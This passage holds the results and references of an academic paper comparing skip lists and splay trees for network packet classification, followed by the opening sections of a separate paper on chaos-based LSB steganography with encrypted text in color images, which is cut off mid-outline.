(1995) decided to mark the elements whose keys had been compared in the search algorithm in order to avoid unnecessary comparisons of the keys during the search in the skip list. Their evaluation criterion in this study was a detailed analysis of the total search cost (expectation and variance) so that the search cost would be calculated based on key-to-key comparisons and the results would be compared with standard search results. Their comparison shows that the cost of their method is much less than the standard search cost. Algorithms and tools This section describes how the algorithms in question operate. Consider the sample rules in Table 1. This set of rules is arranged in descending order based on the fixed length of the source addresses, and if the source addresses are equal, the sorting operations are performed according to the destination addresses. Thus, the address placed at the top of the table has a higher priority than other addresses. The set of the source and destination prefix addresses of the rules must be converted into a range of integers (Trabelsi & Zeidan, 2012). For this purpose, the upper and lower boundaries are first calculated for each prefix in the set of source addresses, as shown in Table 2. For the sake of simplicity, the prefix addresses are displayed in a six-bit format. Splay tree For each field including the source address, destination address, source port number, destination port number, and protocol type, a splay tree should be created (Trabelsi & Zeidan, 2011; Trabelsi & Zeidan, 2012; Trabelsi et al., 2015). In addition to pointers to the left and right children as well as the parent node, each node of the tree contains a value and a counter to hold the number of times the node is matched with the input packets and a list for storing the rules. Initially, the counter of all nodes is set to zero. In the protocol tree, each node contains a list of rules whose protocol field has a value is equal to the value of the node, but in other trees each node contains a list of rules in which the lower boundary is less than or equal to the value of the node and the upper boundary is greater than or equal to the value of the node. As the values of the fields of source address, destination address, source port number, and destination port number have both upper and lower boundaries, they should be inserted into the corresponding trees in two steps (Trabelsi & Zeidan, 2011; Trabelsi et al., 2015). In the first step, the lower boundary is inserted into the tree. If the lower boundary is less than the root value, it is inserted under the left tree, and if it is greater than the root value, it will be inserted under the right tree. Then the value of the lower boundary node Khezrian and Abbasi (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.204 5/16 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.204 Table 1 An example of a set of rules. Each row of the table is a rule of a rule set. Each rule is represented as constraints on source IP, destination IP, source port number, destination port nummber and protocol. Rule Source IP address Destination IP address Source port number Destination port number Protocol R1 100* 011* 56,56 1024,65535 16 R2 010* 001* 70,80 20,20 4 R3 010* 01* 0,65535 2688,2688 16 R4 000* 10* 56,80 0,65535 6 R5 * * 0,6553 2688,2688 16 Table 2 An example of converting source prefix addresses to a numerical range. Each prefix at the sec- ond column of the table is converted to corresponding upper and lower boundaries which are presented at the third and fourth columns. The fifth and sixth columns corresponds to decimal representation of the start and end points of the boundary. Rule Source prefix addresses Lower boundary Upper boundary Start End R1 100* 100000 100111 32 39 R2 010* 010000 010111 16 23 R3 010* 010000 010111 16 23 R4 000* 100000 101111 32 47 R5 * 000000 111111 0 63 is compared with the upper and lower boundary values of all the rules. When the lower boundary value lies within the range of a rule, the ID of that rule is added to the list of lower boundary rules. After being added to the tree, the lower boundary node will be moved to the root of the tree using the rotation operation. The second step is to insert the upper boundary into the tree. This step resembles the insertion of the lower boundary. Figure 1 shows the steps for creating a splay tree for the source address fields of the rules in Table 2. In Fig. 1A, the R1 rule has been added to the tree. To this end, first the lower boundary value is inserted. Since the value of 32 lies within the range of R1 and R5, the ID of these rules is added to the rules list. Then, the value of 39 is inserted and the IDs of R1 and R5 rules are added to its rules list. Finally, 39 is transferred to the root of the tree with a left rotation. In Fig. 1B, the R2 rule has been added to the tree. In this case, the value of 16 is inserted. First the node 16 is searched in the tree and, if it is not found, it will be inserted in the correct place and the IDs of R2, R3, and R5 are added to the its rules list. Finally, the node 16 is transferred to the root through a right rotation between 23 and 39 and a right rotation between 16 and 32. In Fig. 1C, the value of 23, which is the lower boundary of R2, is inserted. In the next step, the R2, R3, and R5 rules are added to its list of rules. Then the node 23 is transferred to the root with through a right rotation between the nodes 23 and 32 and a left rotation between 23 and 16. Finally, the R3 rule is added to the tree. Since its values have already been added, no change occurs in the tree. Skip list To build skip lists (Pan et al., 2016), the set of rules is first transmitted to the program and the upper and lower boundaries of the rules are calculated. For each of the fields of Khezrian and Abbasi (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.204 6/16 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.204 Figure 1 The steps of creating a splay tree. (A) Inserting the R1 rule; (B) inserting the lower boundary of the R2 rule; (C) inserting the upper boundary of the R2 rule. Full-size DOI: 10.7717/peerjcs.204/fig-1 source address, destination address, source port number, destination port number, and protocol type, a skip list must be created. Each skip list contains a value, a list for storing rules, and a list for storing pointers to subsequent nodes based on the level of each node. To determine the level of each node, a random function is used which creates an integer in a specified range (between 0 and 15 in our implementation). In the protocol skip list, each node contains a list of rules whose protocol field has a value equal to the value of the node, but in other skip lists each node contains a list of rules in which the lower boundary of the corresponding field is less than or equal to the value of the node and the upper boundary of the corresponding field is greater than or equal to the value of the node. As the values of the fields of source address, destination address, source port number, and destination port number have both upper and lower boundaries, they should be inserted into the corresponding skip lists in two steps. In the first step, the lower boundary is inserted into the skip list. Then the value of the lower boundary node is compared with the upper and lower boundary values of all the rules. When the lower boundary value lies within the range of a rule, the ID of that rule is added to the list of lower boundary rules. Then, based on the node’s level, a list of pointers is built for the created node. In the second step, we add the upper boundary. This step resembles the insertion of the lower boundary. Figure 2 shows the steps for creating a skip list for the source address field in Table 2. In Fig. 2, the R1 rule has been added to the skip list. First, the lower boundary of 32 at the level 0 is inserted into the skip list. Since the value of 32 lies within the range of R1 and R5, the ID of these rules is added to the rules list. Then the upper boundary of 39 at the level 2 is inserted and the IDs of R1 and R5 rules are added to its rules list. In Fig. 2B, the R2 rule has been added to the skip list. The value of 16 at the level 3 is inserted and the IDs of R2, R3, and R5 are added to its rules list. Next, the value of 23 at the level 1 is inserted and the IDs of R2, R3, and R5 are added to its rules list. In Fig. 2C, the R3 rule is added to the skip list. The values of this rule are repetitive. Packet classification With both skip lists and splay trees, packet classification is as following. When a packet is received, the information of its header including source and destination address, source and destination port number, and protocol type are extracted. Next, for each of the mentioned Khezrian and Abbasi (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.204 7/16 https://peerj.com https://doi.org/10.7717/peerjcs.204/fig-1 http://dx.doi.org/10.7717/peerj-cs.204 Figure 2 Steps to create skip list. (A) Inserting the R1 rule; (B) inserting the R2 rule; (C) inserting the R3 rule. Full-size DOI: 10.7717/peerjcs.204/fig-2 fields in the packet, a skip list or a splay tree is created and searched simultaneously to find a matching node. Search results on any list or tree include a list of matching rules. In order to find a common rule between the five lists obtained from the splay trees, an intersection operation is performed between them. The result of the intersection may be null or contain several rules. If the result is null, the action associated with the default rule is applied to the packet; otherwise, the action related to the rule with the highest priority is applied. Because the rules were initially arranged according to priority, the rule with the smallest row number has the highest priority. As mentioned in the previous section, splay trees are binary search trees that self-adjust so that the deepest met surviving node in any operation becomes the root following the operation. The splay tree stores no balance or weight information, but it performs many tree rotations after every access, which makes it less practically efficient than skip lists in many applications. These rotations can be particularly harmful when nodes are augmented with auxiliary structures. This situation is present in packet classification. Simple operations like move-to-root could partially solve this problem and improve the performance of the splay trees when there is locality of references in the operation sequence. But, it is not ideal in the case of packet classification where the sequence of the burst operations has no predictable locality (Sahni & Kim, 2002). On the contrary, the simplicity of skip list algorithms makes them easier to implement and provides significant constant factor speed improvements over balanced tree and self- adjusting tree algorithms like splay trees (Dean & Jones, 2007). Their scheme is designed to give good expected performance for busty access patterns (Sahni & Kim, 2002). Skip lists are also very space efficient (Sen, 1991; Kirschenhofer, Martínez & Prodinger, 1995). To practically investigate the above predictions about the performance of these two competitor algorithms, we implement and experiment them on several data sets. Implementation and evaluation Splay tree and skip list approaches were implemented in C++ and executed ten times on a system with Intel Core i5 2.30 GHz and 4GB of RAM. The performance criteria were calculated using average results. Khezrian and Abbasi (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.204 8/16 https://peerj.com https://doi.org/10.7717/peerjcs.204/fig-2 http://dx.doi.org/10.7717/peerj-cs.204 The two approaches were evaluated based on the number of memory accesses for packet classification, classification time, and memory usage. The Class Bench tool (Taylor & Turner, 2007) was used to generate rule sets and packet headers. The ACL and IPC rules were created in the evaluations to compare the number of memory accesses for packet classification as well as the times of packet classification with 500, 1 k, and 8 k rules. For our evaluations, we generated a set of 8 k, 32 k, and 128 k packet headers corresponding to each of the set of rules. We also used 1000 IPC and ACL rules to determine the amount of memory usage. First, we look at packet classification time which is the time span from when a packet enters the structure of a classifier until the system can find the matching rule for that packet. The shorter the packet classification time, the more efficient the structure of the classifier will be. Figure 3 shows the time for classifying a wide variety of packets based on the sets of 500, 1k, and 8k ACL and IPC rules for the skip list and splay tree. Figure 3A compares these two approaches for 8 k packets. In these charts, the smallest difference between the two approaches is observed for 500 rules and the largest difference for 8k rules. The skip list classifies packets for 500 IPC and ACL rules in 391 and 1,415 ms, respectively, and the splay tree does this in 1,011 and 2,271 ms, respectively. Also, the packet classification time of the skip list for 8 k IPC and ACL rules is 805 and 4,231 ms, respectively, while this time for the splay tree is 684 and 8,131 ms, respectively. It can be concluded that, with an increased number of rules, the difference in classification time between the performances of the two approaches becomes greater. In fact, the skip list performs this task more optimally than the splay tree. Also, the type of rules plays an important role in packet classification time so that packets are classified in a significantly shorter time when matched with IPC rules. A decreased number of rules would reduce the time difference while increased number of rules would increase this difference. Consequently, the choice of the type of rules for packet classification might affect performance. Figure 3B evaluates both the skip list and splay tree for 32k packets. As mentioned in Fig. 3A, the least difference in packet classification time between ACL and IPC rules is observed for 500 rules where as the largest difference is observed for 8 k rules. The skip list classifies packets for 500 IPC and ACL rules in 1,849 and 4,660 ms, respectively, and the splay tree does this in 5,981 and 7,994 ms, respectively. Also, the packet classification time of the skip list for 8 k IPC and ACL rules is 3,192 and 3,813 ms, respectively, while this time for the splay tree is 11,947 and 25,722 ms, respectively. As a result, with the increase in the number of packets, the skip list still outperforms splay tree in terms of packet classification time. However, increased number of packets has difference in packet classification time of the two approaches for 500 ACL rules smaller than that for 500 IPC rules. This means that, if the number of rules is small enough, an increased number of packets could be best handled by ACL rules; otherwise, IPC rules should be used for larger numbers of rules. The difference is particularly significant in classification with 8 k rules. In Fig. 3C, the results of the classification of 128 k packages are evaluated. In this evaluation, too, the skip list has a better performance than the splay tree. For the set of IPC rules, the smallest difference between the two approaches can be observed for 1 k rules. In this case, the skip list classifies packets in 6,792 ms and the splay tree does this in 11,031 ms. As in the previous part, the Khezrian and Abbasi (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.204 9/16 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.204 Figure 3 Packet classification time for the sets of 500, 1k, and 8k ACL and IPC rules for different num- bers of packets. (A) 8k, (B) 32k, and (C) 128k packets. Full-size DOI: 10.7717/peerjcs.204/fig-3 Khezrian and Abbasi (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.204 10/16 https://peerj.com https://doi.org/10.7717/peerjcs.204/fig-3 http://dx.doi.org/10.7717/peerj-cs.204 smallest difference between these two approaches is observed for the set of 500 ACL rules so that the packet classification time of the skip list is 11,846 ms whereas that of the splay tree is 13,020 ms. The difference in packet classification time between skip list and splay tree with both IPC and ACL rules is significant. This result can be used to select appropriate rules for designing a system that is to be efficient in terms of packet classification. Here again, the greatest difference between the two approaches is manifested in the case of 8 k rules. With 8 k IPC and ACL rules, the skip list classifies packets in 9,508 and 9,778 ms, respective, while splay tree does this task in 22,457 and 72,444 ms, respectively. As can be seen, this time difference for the IPC rules is much smaller than for the ACL rules. In general, Fig. 3 shows that skip list approach classifies packets in a shorter time. In addition, the increase in the packet classification time of the skip list due to increased number of rules is significantly less than that of the splay tree. It can be inferred that skip list has a better performance than the splay tree in the classification of packets. One of the most important criteria for the performance of classification approaches is the speed of search. In the architecture of network processors, memory access is the most important reason for prolonged execution of commands on packets. Frequent access to memory reduces system performance. Reduced memory access would decrease packet classification time and, thus, accelerate the process. Therefore, decreased memory access is central to the efficiency of an approach. Figure 3A evaluates the two approaches for 8k packets. As can be seen, in all cases skip list has fewer memory accesses than splay tree. Also, the minimum number of memory access is 65,477, which belongs to skip list with 500 IPC rules. Splay tree has 477,664 memory accesses with 8 k ACL rules, which is the highest number of access in our evaluation. With the increase in the number of rules, the difference in memory access between the two approaches increases significantly. With 8 k IPC and ACL rules, the skip list has 104,017 and 98,476 memory accesses, respectively, while the splay tree accesses memory 198,664 and 477,664 times, respectively. The greatest difference in the number of memory accesses between the skip list and splay tree is observed in the case of 8 k ACL rules in which splay tree accesses memory 379,188 times more than skip list. Figure 3B compares skip list and splay tree for 128 k packets. As in previous parts, the skip list outperforms the splay tree in terms of memory access. In general, the minimum number of memory access is 215,169 which belongs to the skip list with 500 IPC rules. The maximum number is 1890056 which belongs to the splay tree with 8 k ACL rules. The greatest difference in the number of memory accesses between the skip list and the splay tree is observed in the case of 8 k ACL rules in which the splay tree accesses memory 1496966 times more than the skip list. It can be observed in the chart that the number of memory accesses for both approaches using IPC rules is much smaller than using ACL rules, which could be a reason for preferring IPC rules in the design of such systems. Figure 3C compares the skip list and the splay tree with 128 k packets. The chart shows that, with increase in the number of packets with different numbers of rules, the skip list has less memory access than does the splay tree. In this chart, the smallest number of memory access is 1061018 which belongs to the skip list with 500 IPC rules and the largest number of access is 8024198 which belongs to the splay tree with 8 k ACL rules. The greatest difference between the two approaches is observed in Khezrian and Abbasi (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.204 11/16 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.204 Figure 4 The number of memory accesses for packet classification with sets of 500, 1,000, and 8,000 ACL and IPC rules for different number of packets. (A) 8k, (B) 32k, and (C) 128k packets. Full-size DOI: 10.7717/peerjcs.204/fig-4 the case of 8 k ACL rules, with the splay tree having accessed memory 6356259 times more than the skip list. As can be seen in Fig. 4, the skip list has a better performance than the splay tree in terms of memory access. Also, with increasing number of rules, the increase in the number of memory accesses for the skip list is much smaller than that of the splay Khezrian and Abbasi (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.204 12/16 https://peerj.com https://doi.org/10.7717/peerjcs.204/fig-4 http://dx.doi.org/10.7717/peerj-cs.204 Figure 5 Memory usage for 1k ACL and IPC rules. The red and blue bars represent the memory usage of the splay tree and skip list algorithms respectively. Full-size DOI: 10.7717/peerjcs.204/fig-5 tree. As a result, the performance of the skip list can be considered as more efficient than the splay tree. According to the results of the charts in Figs. 3 and 4, another important point is correspondence in the results of memory access time and number which exactly confirm each other in all cases. Given the memory limitations in the majority of systems and the high costs of upgrading memories, another performance criterion for classification approaches is the amount of memory usage. As a result, every approach should aim at reducing memory usage. Figure 5 shows the amount of memory used in bytes by skip list and splay tree for classifying packets with 1 k ACL and IPC rules. As can be seen, the amount of memory used by skip list is 31,700 bytes with IPC rules and 162,960 bytes for ACL rules whereas the memory usage of splay tree is 30,528 bytes for IPC rules and 158,440 bytes for ACL rules. The amount of memory used by skip list with both sets of rules is slightly more than splay tree. This additional amount of space is used to hold pointers in a skip list. Also, the amount of memory used by both approaches with IPC rules is significantly less than the memory used with ACL rules. However, this additional space can be reasonably justified by significant reduction in the number of memory accesses and packet classification time in skip lists. CONCLUSION Packet classification is among the basic processes in network processors. The most important issue is the use of a packet classification approach that can keep up with the network speed. Such an approach should also optimize memory consumption. The existing methods have not been able to balance the time and memory consumption. On the other hand, binary trees work well when the elements enter accidentally, but they become inefficient in cases where the operations are sequential. In this study, therefore, we focused on the skip list and the splay tree and evaluated these two approaches with ACL and IPC rules. Our results suggest that skip list performs better in terms of package Khezrian and Abbasi (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.204 13/16 https://peerj.com https://doi.org/10.7717/peerjcs.204/fig-5 http://dx.doi.org/10.7717/peerj-cs.204 classification time and the number of memory accesses. Also, with increase in the number of rules, packet classification time and memory access increase less in a skip list than in a splay tree. The amount of memory used by the skip list is slightly more than the splay tree, which is due to storing the pointers in skip lists. However, this additional space can be reasonably justified by significant reduction in the number of memory accesses and packet classification time in skip lists. Accordingly, the skip list can be considered as superior to the splay tree. Obviously, the data and control dependencies in the algorithms will change their performance in parallel processing. Therefore, the authors aim to study the parallelization of both algorithms on graphics processors and evaluate the performance of their parallel versions in further research. ADDITIONAL INFORMATION AND DECLARATIONS Funding The authors received no funding for this work. Competing Interests The authors declare there are no competing interests. Author Contributions • Navid Khezrian performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, prepared figures and/or tables, performed the computation work, approved the final draft. • Mahdi Abbasi conceived and designed the experiments, analyzed the data, contributed reagents/materials/analysis tools, performed the computation work, authored or reviewed drafts of the paper, approved the final draft, submission of the paper. Data Availability The following information was supplied regarding data availability: The raw measurements are available in Supplemental Files. Supplemental Information Supplemental information for this article can be found online at http://dx.doi.org/10.7717/ peerj-cs.204#supplemental-information. REFERENCES Baboescu F, Varghese G. 2001. Scalable packet classification. ACM SIGCOMM Computer Communication Review 31(4):199–210 DOI 10.1145/964723.383075. Bi X-A, Luo X, Sun Q. 2019. Branch tire packet classification algorithm based on single-linkage clustering. Mathematics and Computers in Simulation 155:78–91 DOI 10.1016/j.matcom.2017.11.003. Bontupalli V, Yakopcic C, Hasan R, Taha TM. 2018. Efficient memristor-based archi- tecture for intrusion detection and high-speed packet classification. ACM Journal on Emerging Technologies in Computing Systems 14(4):41. Khezrian and Abbasi (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.204 14/16 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.204#supplemental-information http://dx.doi.org/10.7717/peerj-cs.204#supplemental-information http://dx.doi.org/10.7717/peerj-cs.204#supplemental-information http://dx.doi.org/10.1145/964723.383075 http://dx.doi.org/10.1016/j.matcom.2017.11.003 http://dx.doi.org/10.7717/peerj-cs.204 Comer DE. 2004. Network systems design with network processors, agere version. Upper Saddle River: Prentice Hall. Dean BC, Jones ZH. 2007. Exploring the duality between skip lists and binary search trees. In: Proceedings of the 45th annual southeast regional conference. New York: ACM, 395–399. Gao L, Tan M-F, Gong Z-H. 2006. Survey and evaluation of IP packet classification algorithms. Computer Engineering & Science 28(3):70–73. Harada T, Tanaka K, Mikawa K. 2018. Acceleration of packet classification via inclusive rules. In: 2018 IEEE conference on Communications and Network Security (CNS). Piscataway: IEEE. Inoue T, Mano T, Mizutani K, Minato S-I, Akashi O. 2018. Fast packet classification algorithm for network-wide forwarding behaviors. Computer Communications 116:101–117 DOI 10.1016/j.comcom.2017.11.011. Kaufmann M. 2007. Network routing algorithms, protocols, and architectures. Burlington: Morgan Kaufmann. Kirschenhofer P, Martínez C, Prodinger HJTCS. 1995. Analysis of an optimized search algorithm for skip lists. Theoretical Computer Science 144(1–2):199–220. Li W, Li X, Li H, Xie G. 2018. CutSplit: a decision-tree combining cutting and splitting for scalable packet classification. In: IEEE INFOCOM 2018—IEEE conference on computer communications. Piscataway: IEEE. Li Y, Zhang D, Liu AX, Zheng J. 2013. GAMT: a fast and scalable IP lookup engine for GPU-based software routers. In: Proceedings of the ninth ACM/IEEE symposium on architectures for networking and communications systems. Piscataway: IEEE Press. Lim H. 2010. Survey and proposal on packet classification algorithms. In: 2010 interna- tional conference on high performance switching and routing. Piscataway: IEEE. Lin F, Wang G, Zhou J, Zhang S, Yao X. 2016. High-performance IPv6 address lookup in GPU-accelerated software routers. Journal of Network and Computer Applications 74:1–10 DOI 10.1016/j.jnca.2016.08.004. Nagpal B, Singh N, Chauhan N, Murari R. 2015. A survey and taxonomy of various packet classification algorithms. In: 2015 international conference on advances in computer engineering and applications. Piscataway: IEEE. Neji NB, Bouhoula A. 2008. Self-adjusting scheme for high speed routers. In: 2008 33rd IEEE Conference on Local Computer Networks (LCN). Piscataway: IEEE. Pan T, Huang T, Liu J, Zhang J, Yang F, Li S, Liu Y. 2016. Fast content store lookup using locality-aware skip list in content-centric networks. In: 2016 IEEE conference on Computer Communications Workshops (INFOCOM WKSHPS). Piscataway: IEEE. Papadakis T. 1993. Skip lists and probabilistic analysis of algorithms. PhD Dissertation, University of Waterloo. Perez KG, Yang X, Scott-Hayward S, Sezer S. 2014. Optimized packet classification for Software-Defined Networking. In: IEEE International Conference on Communications (ICC). Piscataway: IEEE. Pugh W. 1990. Skip lists: a probabilistic alternative to balanced trees. Communications of the ACM 33(6):668–676. Khezrian and Abbasi (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.204 15/16 https://peerj.com http://dx.doi.org/10.1016/j.comcom.2017.11.011 http://dx.doi.org/10.1016/j.jnca.2016.08.004 http://dx.doi.org/10.7717/peerj-cs.204 Qi Y, Xu L, Yang B, Xue Y, Li J. 2009. Packet classification algorithms: from theory to practice. In: IEEE INFOCOM 2009. Piscataway: IEEE. Sahni S, Kim KS. 2002. Data structures for IP lookup with bursty access patterns. Available at https://www.cise.ufl.edu/~sahni/papers/burstyc.pdf. Sen SJIPL. 1991. Some observations on skip-lists. Information Processing Letters 39(4):173–176 DOI 10.1016/0020-0190(91)90175-H. Sleator DD, Tarjan RE. 1985. Self-adjusting binary search trees. Journal of the ACM 32(3):652–686 DOI 10.1145/3828.3835. Srinivasan V, Suri S, Varghese G. 1999. Packet classification using tuple space search. ACM SIGCOMM Computer Communication Review 29(4):135–146 DOI 10.1145/316194.316216. Taylor DE. 2005. Survey and taxonomy of packet classification techniques. ACM Computing Surveys (CSUR) 37(3):238–275 DOI 10.1145/1108956.1108958. Taylor DE, Turner JSJIATON. 2007. Classbench: a packet classification benchmark. IEEE/ACM Transactions on Networking 15(3):499–511. Tessier R, Wolf T, Hu K, Chandrikakutty H. 2018. Reconfigurable network router secu- rity. In: Gaillardon P-E, ed. Reconfigurable logic: architecture, tools, and applications. Boca Raton: CRC Press. Trabelsi Z, Masud MM, Ghoudi KJC, Security. 2015. Statistical dynamic splay tree filters towards multilevel firewall packet filtering enhancement. Computers & Security 53:109–131 DOI 10.1016/j.cose.2015.05.010. Trabelsi Z, Zeidan S. 2011. Splay trees based early packet rejection mechanism against DoS traffic targeting firewall default security rule. In: 2011 IEEE international workshop on information forensics and security. Piscataway: IEEE. Trabelsi Z, Zeidan S. 2012. Multilevel early packet filtering technique based on traffic statistics and splay trees for firewall performance improvement. In: 2012 IEEE International Conference on Communications (ICC). Piscataway: IEEE. Zeidan S, Trabelsi Z. 2011. A survey on firewall’s early packet rejection techniques. In: 2011 International Conference on Innovations in Information Technology. Piscataway: IEEE. Zhong T, Geng J, Zhao K. 2013. An efficient authenticated data structure for dynamic data set based on B+ tree. In: 2013 International Conference on Communications, Circuits and Systems (ICCCAS). Piscataway: IEEE. Khezrian and Abbasi (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.204 16/16 https://peerj.com https://www.cise.ufl.edu/~sahni/papers/burstyc.pdf http://dx.doi.org/10.1016/0020-0190(91)90175-H http://dx.doi.org/10.1145/3828.3835 http://dx.doi.org/10.1145/316194.316216 http://dx.doi.org/10.1145/1108956.1108958 http://dx.doi.org/10.1016/j.cose.2015.05.010 http://dx.doi.org/10.7717/peerj-cs.204 work_xkh7hjnskrfjrgg22exaud7tam ---- Steganography in color images with random order of pixel selection and encrypted text message embedding Steganography in color images with random order of pixel selection and encrypted text message embedding Krasimir Kordov1 and Stanimir Zhelezov2 1 Department of Computer Informatics, Faculty of Mathematics and Computer Science, Konstantin Preslavski University of Shumen, Shumen, Shumen, Bulgaria 2 Department of Computer Systems and Technologies, Faculty of Mathematics and Computer Science, Konstantin Preslavsky University of Shumen, Shumen, Shumen, Bulgaria ABSTRACT Information security is major concern in modern digital ages, and the outdated algorithms need to be replaced with new ones or to be improved. In this article a new approach for hiding secret text message in color images is presented, combining steganography and cryptography. The location and the order of the image pixels chosen for information embedding are randomly selected using chaotic pseudo- random generator. Encrypting the secret message before embedding is another level of security designed to misguide the attackers in case of analyzing for traces of steganography. Evaluating the proposed stegoalgorithm. The standard statistical and empirical tests are used for randomness tests, key-space analysis, key-sensitivity analysis, visual analysis, histogram analysis, peak signal-to-noise ratio analysis, chi-square analysis, etc. The obtained results are presented and explained in the present article. Subjects Algorithms and Analysis of Algorithms, Cryptography, Multimedia, Security and Privacy Keywords Steganography, Text encryption, Color images steganography, Least-significant bit steganography, Steganographic analysis INTRODUCTION Steganology is an ancient science that is becoming more and more widely used with the development of digital information. It consists of two main areas: steganography and steganalysis. Steganography is an interdisciplinary applied science field (Cox et al., 2007; Stanev & Szczypiorski, 2016), a set of technical skills and art for ways to hide the fact of transmission (presence) of information. It is one of the most effective approaches to protecting important information by hiding it (data hiding). High-tech steganography summarizes the areas for hiding messages using communication and computer technology, nanotechnology and modern advances in sciences such as biology, chemistry and others (Wu et al., 2020; Koptyra & Ogiela, 2020; Abd-El-Atty et al., 2020). Steganalysis has exactly the opposite task. It combines methods and technologies for detecting secret steganographic communications. Along with the beginning of the development of modern ways of hiding information, at the end of the 20th century research in the field of steganalysis (Johnson & Jajodia, 1998; Provos & Honeyman, 2001; How to cite this article Kordov K, Zhelezov S. 2021. Steganography in color images with random order of pixel selection and encrypted text message embedding. PeerJ Comput. Sci. 7:e380 DOI 10.7717/peerj-cs.380 Submitted 14 November 2020 Accepted 10 January 2021 Published 28 January 2021 Corresponding author Krasimir Kordov, krasimir.kordov@shu.bg Academic editor Robertas Damaševičius Additional Information and Declarations can be found on page 19 DOI 10.7717/peerj-cs.380 Copyright 2021 Kordov and Zhelezov Distributed under Creative Commons CC-BY 4.0 http://dx.doi.org/10.7717/peerj-cs.380 mailto:krasimir.�kordov@�shu.�bg https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/10.7717/peerj-cs.380 http://www.creativecommons.org/licenses/by/4.0/ http://www.creativecommons.org/licenses/by/4.0/ https://peerj.com/computer-science/ Fridrich & Goljan, 2002) has begun. Steganalysis is divided into two main categories: blind and targeted (Zhelezov, 2016). Targeted steganalysis methods have been developed to detect data embedded with specific stegoalgorithms and they are very accurate against certain stegomethods. The blind analysis methods are based on algorithms that require prior “training” with a series of empty and filled containers. The most characteristic of both types of analysis is that their methods are based on statistical dependencies in the analyzed subjects (Nissar & Mir, 2002). Such a method is POV (Pairs of Values) as part of the chi-square analysis (Westfeld & Pfitzmann, 1999; Fridrich, Goljan & Du, 2001). Related work One of the latest research which shows successful Optical Character Recognition (OCR) steganography technique with good results in steganalysis, is presented in (Chatterjee, Ghosal & Sarkar, 2020). Other example of resent steganographic research is described in (Pak et al., 2020), where the authors are using chaotic map for constructing a steganographic algorithm. Popular methods for image steganography are analyzed in Table 1. The main task of the steganographic algorithm is to reduce the efficiency of such methods and thus to increase its reliability. For this purpose, it is necessary to choose a method of embedding that does not violate the statistical dependencies. For this reason, a Spread Spectrum Steganography approach (Marvel, Boncelet & Retter, 1999; Satish et al., 2004) based on a pseudo-random sequence generator has been chosen in this article. Additional text encryption is applied for transforming the secret message into unreadable character sequence for increasing the level of security of the proposed steganographic algorithm. In this approach, the resulting pseudo-random sequences are used to determine the message embedding positions. This leads to preserving the statistical dependencies in the container. Another advantage of this approach is related to some types of targeted steganalysis. They extract the values of the smallest bits of the file sequentially and analyze them for repetitive sequences. With the embedding method proposed in the article this type of steganalysis is completely ineffective. Motivation and justification The text messages and the digital images are the most used information carriers concerning the data flow in the Internet and mobile communications. There are thousand of chat applications designed for short text messages correspondence using different ways to secure the communications between the users. Variety of cryptographic algorithms are implemented in order to protect the transferred information. Unfortunately, some of the encryption methods have become outdated and the new ones are being invented to improve secure communication. Information security will always be a major concern that motivates the development of new secret methods for data distribution and real-time communication. Such method is proposed in this work by combining two general scientific areas: steganography and cryptography. Kordov and Zhelezov (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.380 2/21 http://dx.doi.org/10.7717/peerj-cs.380 https://peerj.com/computer-science/ Table 1 Survey of some recent stego research. Reference Marvel, Boncelet & Retter (1999) Method The method uses a fast compressed-domain embedding technique to facilitate on-the-fly compressed-domain public-key steganography Notes Low probability of detection and leaving an observer unaware that the hidden data exist. The method works with grayscale images Reference Satish et al. (2004) Method The method is based on a scheme of chaos based spread spectrum image steganography (CSSIS) involving the use of chaotic encryption and chaotic modulation in spread spectrum image steganography (SSIS) Notes A novel scheme of the use of chaos based encryption. Robustness is achieved by interleaving the message using a chaotic sequence Reference Baby et al. (2015) Method The method is based on hiding multiple color images into a single color image using the Discrete Wavelet Transform Notes DWT increases the payload of the steganographic process by data compression. The proposed approach provides a good PSNR and SSIM value which establish the robustness of this work Reference Amirulhaqi, Purboyo & Nugrahaeni (2017) Method The method is based on Spread Spectrum Steganography and the Vigenere Cipher embedding in gif images Notes The method consists of three processes, namely the spreading, modulation, and insertion of a GIF image to the message Reference Yadav & Dutta (2017) Method The method is based on spread spectrum image steganography with RSA message encryption. Notes High level of security. Spreading the message all over the pixels of the cover media using pseudo random generator that generates random locations of pixels in an image and embedding message with Least Significant Bit algorithm to make it highly indiscernible Reference Gaurav & Ghanekar (2018) Method The method presents a steganography algorithm based on local reference edge detection technique and exclusive disjunction in the sharp edge region compared to the uniform region of the image Notes This paper presents an improved steganography technique on the basis of HVS system with an improved XOR technique Reference Chatterjee, Ghosal & Sarkar (2020) Method The method is based on Optical Character Recognition (OCR) based Steganographic technique. Notes Advantages—indicating correct classification by the model and high PSNR values. The method works with grayscale images. Slow embedding process for large images Reference Pak et al. (2020) Method The method is based on an improved 1D chaotic system model Notes The conventional one-dimensional (1D) chaotic map has a simple structure, which is easy to implement and has a low computational cost. The algorithm shows a good performance against statistical analysis attacks. Conventional one-dimensional (1D) chaotic map has a drawback that the range of chaotic behaviors is narrow and the distribution of key sequence is uniform Kordov and Zhelezov (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.380 3/21 http://dx.doi.org/10.7717/peerj-cs.380 https://peerj.com/computer-science/ An outline of the proposed work Our main focus is to present a different approach for classic LSB Steganography in images using random order of pixel selection and embedding encrypted text message. In order to achieve our goal the proposed technique requires the following steps: � constructing novel pseudo-random generator � secure text encryption, using the constructed pseudo-random generator � choosing random pixels (in chaotic order) from an image, using the constructed pseudo- random generator for 